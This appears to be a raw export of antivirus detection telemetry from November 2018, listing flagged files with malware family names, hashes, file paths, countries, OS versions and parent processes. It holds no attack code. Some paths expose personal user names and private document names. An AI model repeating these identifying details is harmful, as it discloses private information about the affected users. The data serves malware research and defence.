  Row(detection=Row(filename='winspool.drv', filepath='C:\\Windows\\SysWOW64\\winspool.drv', filesize=320000, name='TR/Crypt.XPACK.Gen7.#M300.#R602680'), hash='b82314ad5aff163e9d602cf40f373ef1d4067e757282affc55acadd176196ca3', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nskBD05.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142920-25d0c967', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142920-25D0C967', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080721-104e39e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b500daa0\\AVSCAN-20181101-080639-0BFA43B9\\AVSCAN-20181101-080721-104E39E2', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:08:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110315-c024aa0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110315-C024AA0B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='drive_content_do_not_modify.exe', filepath='G:\\Android\\data\\com.google.android.gms\\files\\drive_content_do_not_modify.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='d9186a5819ffad47f82a6e1720812a0589ad39f9fda4f4c32e690f1205f8e2e3', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iocbc5f700a-1792-fe43-a203-4b50ef4f7277.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocBC5F700A-1792-FE43-A203-4B50EF4F7277.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:56:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lalria_harmeet.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Lalria_Harmeet.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='73e5347a1f749cfc99c19f79e18c6855c761f039841989a472b2f1b3aa196c2b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\save\\Neuer Ordner\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='78d09462c04f5750efc0ce85619ec94ae431af9ae2cc79596f9b048fec90eae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m7q6Ck3JIUCADdP8.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184348-f0d1aa57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-184331-EE906FF3\\AVSCAN-20181101-184348-F0D1AA57', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:18:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2050da2c844d414f06df92f06dfbd2c05f481fb9cabce29290d23047b5b36651', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\2050DA2C844D414F06DF92F06DFBD2C05F481FB9CABCE29290D23047B5B36651', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='2050da2c844d414f06df92f06dfbd2c05f481fb9cabce29290d23047b5b36651', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:57:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2b4b', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2b4b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f3836304.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\asoftech\\DataRecovery\\data\\temp.29\\f3836304.exe', filesize=64000, name='W32/Sality.Patched.#M1.#R1'), hash='3c599ffcdb5e07ffc8a3b6cffeda89d46ae82bfa3c1eb04fa575965019e4360b', metadata=Row(cmdline='\\\\\\/d \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Asoftech\\\\\\\\DataRecovery\\\\\\\\data\\\\\\\\temp\\\\\\" \\\\\\/cmd \\\\\\/dev\\\\\\/sdc fileopt,everything,enable,search', country='BO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Roaming\\asoftech\\DataRecovery\\photo.exe', parentsize=411648, timestamp='2018-11-01T16:05:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T01:38:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:29:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215025-d8bbef70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-214228-937D9B6E\\AVSCAN-20181101-215025-D8BBEF70', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:50:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Új mappa\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Új mappa\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:40:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="احمد الالمانى's files.exe", filepath="I:\\.Trashes\\احمد الالمانى's Files.exe", filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='83ef079fb538f232884ca1f3c64ad14e939d3ddcf013d1089320abc77477beab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T04:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\febin mathew\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\DXM5RA70\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M0.#R0'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='8', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:52:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-130942-f884e000', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aacd22b7\\AVSCAN-20181101-130853-EFC7726D\\AVSCAN-20181101-130942-F884E000', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:12:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T05:58:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='69b0f5c04b12d3bbabb62464a98b6821d44f5213d738b885f10ff40f4c56808a', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:16:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005510-21fb9273', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-005510-21FB9273', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2bd9802932f841683bb660f9c76617c35f618f8c36f51b3c8caca077a156667c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2BD9802932F841683BB660F9C76617C35F618F8C36F51B3C8CACA077A156667C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2bd9802932f841683bb660f9c76617c35f618f8c36f51b3c8caca077a156667c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112011-077fccd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5ce1c53\\AVSCAN-20181101-111837-F72440FB\\AVSCAN-20181101-112011-077FCCD0', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hnugijbl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\HnUgijBL.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='cc11dae64dc422c4d2d0e86d26c0915017c7ac4ce6516e6321ad26304bae7138', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='customer no 492980.doc', filepath='C:\\Users\\X\\Downloads\\Customer No 492980.doc', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T23:55:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212252-e5b873f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212252-E5B873F2', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3mnufzljt0n\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:59:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir002', filepath='\\\\?\\C:\\Applications\\Service.VIR002', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\3lrcnbaarvu\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541084365.5bdb14cd504a1', country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Free\\673721701.exe', parentsize=671232, timestamp='2018-11-01T15:00:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T16:51:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0059196.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0059196.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:30:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='istruttore forestale.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\ISTRUTTORE FORESTALE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\04boqfvo3qe\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zbaymwct.exe', filepath='I:\\RECYCLER_DETEC\\S-6-6-57-2067840111-7214750817-811023153-6264\\ZbaYmWCt.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='85b5ed79c450aa6b5ec8dfb19944d48f7ba5e0dd5faf2b708492663cc441364e', metadata=Row(cmdline='\\\\\\"I:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T08:16:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101325-b2e7ccc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_820d26ba\\AVSCAN-20181101-100037-47E38871\\AVSCAN-20181101-101325-B2E7CCC3', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='a6af29130b37d8eb0e1b3b0d4a52a72e995de380595d877700aa54d5d593e40d', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ispkcfg.exe', filepath='C:\\1C\\ISSK\\IspKCfg.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='e43ae1b86d2b45c2f87f976d91136649f3adfb6eef0aaac3a4e41a9adce09e43', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T04:19:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093948-c9434ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093948-C9434ADE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d879ec87580aa0b0525962900b7ad7fd6d246a852874c0737e7a6c641c508ea4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\D879EC87580AA0B0525962900B7AD7FD6D246A852874C0737E7A6C641C508EA4', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='d879ec87580aa0b0525962900b7ad7fd6d246a852874c0737e7a6c641c508ea4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094441-013eddf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094441-013EDDF9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename="addetti all'attivita' funebre.exe", filepath="E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI\\ADDETTI ALL'ATTIVITA' FUNEBRE.exe", filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:41Z'), dt=datetime.date(2018, 11, 1)),
